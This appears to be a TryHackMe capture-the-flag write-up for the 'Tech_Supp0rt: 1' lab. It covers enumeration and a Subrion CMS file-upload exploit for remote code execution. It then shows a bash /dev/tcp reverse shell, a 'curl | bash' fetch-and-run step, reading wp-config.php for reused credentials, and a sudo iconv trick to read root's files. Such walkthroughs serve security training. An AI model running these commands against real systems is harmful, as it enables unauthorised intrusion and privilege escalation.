THM Writeup – Tech_Supp0rt: 1

THM Writeup – Tech_Supp0rt: 1

THM Writeup - Tech_Supp0rt: 1

Hack into the scammer’s under-development website to foil their plans

Room: Tech_Supp0rt: 1

Difficulty: Easy

Operating System: Linux

Author: Vikaran

Hack into the machine and investigate the target.
Note: The theme and security warnings encountered in this room are part of the challenge.

Add IP address to your hosts file:

echo '10.10.172.7    tech.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv tech.thm

PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack ttl 64
80/tcp  open  http         syn-ack ttl 64
139/tcp open  netbios-ssn  syn-ack ttl 64
445/tcp open  microsoft-ds syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 22,80,139,445 tech.thm

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_  256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (EdDSA)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:CA:6E:F1:0E:ED (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-05-04T11:19:24+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-05-04 06:49:26
|_  start_date: 1600-12-31 23:58:45

We have 4 ports open: 22 (SSH – Secure Shell), 80 (WEB – Web Server), 139 (Netbios-ssn) and 445 (SMB – Samba Share)

We cannot do anything with SSH now, on port 80 is Apache2 Ubuntu Default Page – I checked the page source and found nothing, so we should probably enumerate SAMBA at this point.

Enumeration

Download enum4linux, a tool used to enumerate SMB shares on both Windows and Linux systems and make it executable:

wget https://raw.githubusercontent.com/CiscoCXSecurity/enum4linux/master/enum4linux.pl
chmod +x enum4linux.pl

List possible users:

root@attackbox:~# ./enum4linux.pl -U tech.thm
WARNING: polenum is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May  4 06:59:49 2022

 =========================================( Target Information )=========================================

Target ........... tech.thm
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==============================( Enumerating Workgroup/Domain on tech.thm )==============================


[E] Can't find workgroup/domain



 =====================================( Session Check on tech.thm )=====================================


[+] Server tech.thm allows sessions using username '', password ''


 ==================================( Getting domain SID for tech.thm )==================================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


 =========================================( Users on tech.thm )=========================================

Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

As we can see the server allows sessions without username and password.

List remote shares using smbmap:

root@attackbox:~# smbmap.py -H tech.thm -u anonymous

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com   
                     https://github.com/ShawnDEvans/smbmap

                                                                                                    
[+] IP: tech.thm:445	Name: unknown             	Status: Guest session   
        Disk                                                  	Permissions	Comment
    ----                                                  	-----------	-------
    print$                                            	NO ACCESS	Printer Drivers
    websvr                                            	READ ONLY	
    IPC$                                              	NO ACCESS	IPC Service (TechSupport server (Samba, Ubuntu))

Now connect to websvr share:

root@attackbox:~# smbclient //tech.thm/websvr
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \>

Instead of typing a password, hit ENTER.

List files and download what you’ll find:

smb: \> ls
  .                                   D        0  Sat May 29 08:17:38 2021
  ..                                  D        0  Sat May 29 08:03:47 2021
  enter.txt                           N      273  Sat May 29 08:17:38 2021

        8460484 blocks of size 1024. 5700016 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (44.4 KiloBytes/sec) (average 44.4 KiloBytes/sec)

Open another terminal window and read the enter.txt:

root@attackbox:~# cat enter.txt 
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:[REDACTED][cooked with magical formula]
Wordpress creds
|->

Look at point 2 – there might be more web apps on port 80.

Directory brute-force the web application:

root@attackbox:~# gobuster dir -u http://tech.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
===============================================================
/index.html (Status: 200)
/wordpress (Status: 301)
/test (Status: 301)
/phpinfo.php (Status: 200)
/server-status (Status: 403)
===============================================================

While enumeration was running I tried to browse to http://tech.thm/subrion and I was redirected to http://10.0.2.15/subrion/subrion/ – the IP address is not the IP address of the target box!

Then I read the point 2 again – “Fix subrion site, /subrion doesn’t work, edit from panel” and tried to browse to http://tech.thm/subrion/panel and was successful:

subrion admin panel

To log in I tried to use credentials we found in the enter.txt file earlier:

subrion admin panel - failed login

No luck, however there is a note near credentials – “cooked with magical formula” – the password is probably somehow encoded.

I used CyberChef and Magic recipe to decode the password:

CyberChef - Magic

So try to log in again:

subrion dashboard

Exploitation

At this point I looked around a little bit, but found nothing interesting, so I searched for subrion cms 4.2.1 exploit:

subrion cms 4.2.1 exploit search results

And I found Arbitrary File Upload exploit:

subrion cms 4.2.1 arbitrary file upload

Copy the exploit to a file named e.g. exploit.py and make it executable:

chmod +x exploit.py

Install BeautifulSoup4 (the exploit uses it):

pip install BeautifulSoup4

Now run the exploit:

root@attackbox:~# python3 exploit.py -u http://tech.thm/subrion/panel/ -l admin -p Scam2021
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://tech.thm/subrion/panel/
[+] Success!
[+] Got CSRF token: PKtaiV4Gn6G9opwIn6OpxWPZ5l0nRtdYNwuzohte
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: vwroruadxssgzgz

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://tech.thm/subrion/panel/uploads/vwroruadxssgzgz.phar 

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$

And we have RCE.

Open another terminal window and run netcat listener:

nc -lnvp 4242

Create a file named shell.sh with this content:

bash -i >& /dev/tcp/10.10.121.191/4242 0>&1

Edit IP address and PORT of your attacking machine accordingly.

Run python web server:

python3 -m http.server

Go back to your RCE terminal window, download and execute the shell.sh file:

curl 10.10.121.191:8000/shell.sh | bash

And we received a reverse shell:

reverse shell

Upgrade the shell:

python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo; fg ENTER ENTER
stty rows 30 columns 100
export TERM=xterm-256color

Now look around:

www-data@TechSupport:/var/www/html/subrion/uploads$ ls -la /home/
total 12
drwxr-xr-x  3 root     root     4096 May 28  2021 .
drwxr-xr-x 23 root     root     4096 May 28  2021 ..
drwxr-xr-x  4 scamsite scamsite 4096 May 29  2021 scamsite
www-data@TechSupport:/var/www/html/subrion/uploads$ cd /home/scamsite/
www-data@TechSupport:/home/scamsite$ ls -lA
total 24
-rw------- 1 scamsite scamsite  151 May 28  2021 .bash_history
-rw-r--r-- 1 scamsite scamsite  220 May 28  2021 .bash_logout
-rw-r--r-- 1 scamsite scamsite 3771 May 28  2021 .bashrc
drwx------ 2 scamsite scamsite 4096 May 28  2021 .cache
-rw-r--r-- 1 scamsite scamsite  655 May 28  2021 .profile
-rw-r--r-- 1 scamsite scamsite    0 May 28  2021 .sudo_as_admin_successful
drwxr-xr-x 2 root     root     4096 May 29  2021 websvr

Ok, we only have 2 users on this machine: root user and the scamsite user. When we take a look at gobuster’s results we see there is a WordPress site – so let’s find wp-config.php file – there might be some credentials saved:

www-data@TechSupport:/home/scamsite$ find / -type f -name "wp-config.php" 2>/dev/null
/var/www/html/wordpress/wp-config.php

Open the file and look for credentials:

wordpress config file

We now have database username and password.

Let’s try to switch to user scamsite using password for database we have just found:

www-data@TechSupport:/home/scamsite$ su scamsite       
Password: 
scamsite@TechSupport:~$

Bingo, we are now user scamsite – here we can see how dangerous password reuse is…

To be able to read root flag we have to escalate our privileges – try basic vectors, first what our user can do with sudo:

scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

Use GTFObins to find the way to exploit it:

gtfobins sudo iconv

Read the root flag:

scamsite@TechSupport:~$ sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "/root/root.txt"
[REDACTED]  -

Do you like this writeup? Check out other THM Writeups.

Comments are closed.